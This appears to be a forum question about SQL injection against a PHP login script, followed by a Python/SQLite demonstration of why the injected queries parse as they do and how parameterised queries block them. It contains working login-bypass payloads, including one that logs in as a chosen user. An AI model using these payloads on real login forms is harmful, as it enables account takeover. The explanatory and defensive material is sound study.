I don't understand the SQL syntax problems that I get when I launch an injection attack, so any help explaining them is very much appreciated. I have a target PHP login script that takes a combination of username and password, and then it starts, very simply, with
Select * FROM users WHERE username='$username' AND password='$password'
When I put in
$username = ' OR '1=1
$password = ' OR '1=1
the system registers me as admin because it calculates
Select * FROM users WHERE username='' OR '1=1' AND password='' OR '1=1'
and gets the match for the first user record in the database (admin). Now I'm trying to get the script to register me as an arbitrary user named adrian. My thought was to supply
$username = adrian
$password = ' OR (1=1 AND username='adrian') --
which I thought would be evaluated as
Select * FROM users WHERE username='adrian' AND password='' OR (1=1 AND username='adrian')
I thought the logical order of operations is left to right when parentheses are not specified:
Select * FROM users WHERE [[[username='adrian'] AND password=''] OR (1=1 AND username='adrian')]
but it does not register me as anyone (and does not give me any errors). Even if AND is evaluated last, this statement would be evaluated as
Select * FROM users WHERE [username='adrian'] AND [password='' OR (1=1 AND username='adrian')]
This would still be true for the adrian user. At the same time,
$username = adrian
$password = 'or(1=1 and username='adrian') --
registers me as adrian correctly, which evaluates to
Select * FROM users WHERE username='adrian' AND password=''or(1=1 AND username='adrian')
So, why does my OR approach fail when my or approach works?
RESOLVED: Thanks for the guidance. Now I understand SQL better, but my real problem was that autocomplete removed the space after the "-". I must have got it wrong the first time, and then stupidly relied on autocomplete since.
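The precedence question in the post (does `AND` bind tighter than `OR`, and how does the concatenated query actually get parsed?) and the fix a defender would apply can both be checked against a real SQL engine. The following is an added example, not the poster's script or any library's code: it rebuilds the login query from the post in Python over an in-memory SQLite database with a constructed two-user table (usernames `admin` and `adrian` with made-up passwords, stored in plaintext only to keep the query shape identical to the post), runs the post's own inputs through the string-concatenated query and through a parameterised one, and probes the engine's `AND`/`OR` precedence directly.

```python
import sqlite3

# Constructed sample data; not the poster's database.
USERS = [("admin", "s3cret-admin"), ("adrian", "s3cret-adrian")]


def make_db():
    """Build an in-memory SQLite database holding the two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(conn, username, password):
    """Mirrors the post's script: both inputs are pasted into the SQL text,
    so quote characters in them change the structure of the statement."""
    query = (
        "SELECT username FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Parameterised version: the inputs are bound as values and are never
    parsed as SQL, so the statement structure is fixed at write time."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


def and_binds_tighter(conn):
    """True when the engine parses `1 OR 0 AND 0` as `1 OR (0 AND 0)` (= 1).
    A left-to-right reading, `(1 OR 0) AND 0`, would yield 0 instead."""
    return conn.execute("SELECT 1 OR 0 AND 0").fetchone()[0] == 1


if __name__ == "__main__":
    db = make_db()
    print("AND binds tighter than OR:", and_binds_tighter(db))
    # The post's first input pair: the concatenated WHERE clause becomes
    #   username='' OR '1=1' AND password='' OR '1=1'
    # which the engine reads as
    #   username='' OR ('1=1' AND password='') OR '1=1'
    # and the trailing OR '1=1' is true for every row, so the first row wins.
    print("vulnerable:", vulnerable_login(db, "' OR '1=1", "' OR '1=1"))
    # The post's second input pair: the clause is read as
    #   (username='adrian' AND password='') OR (1=1 AND username='adrian')
    # and the `--` turns the dangling quote into a comment.
    print("vulnerable:", vulnerable_login(db, "adrian", "' OR (1=1 AND username='adrian') --"))
    # The same inputs against the parameterised query match nothing.
    print("safe:", safe_login(db, "' OR '1=1", "' OR '1=1"))
    print("safe:", safe_login(db, "adrian", "s3cret-adrian"))
```

Two details worth noticing when reading the expanded queries in the post: `'1=1'` in `username='' OR '1=1'` is a string literal, not the comparison `1=1`, and it only counts as true because SQLite (like MySQL) coerces the leading `1` to a number when a string appears in a boolean position; and SQLite accepts `--` as a comment start with no following space, whereas MySQL requires the space, which is exactly the difference the poster's autocomplete was silently removing. Neither detail matters once the query is parameterised: `safe_login` returns `None` for the injected inputs because they are compared as literal text against the stored columns.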
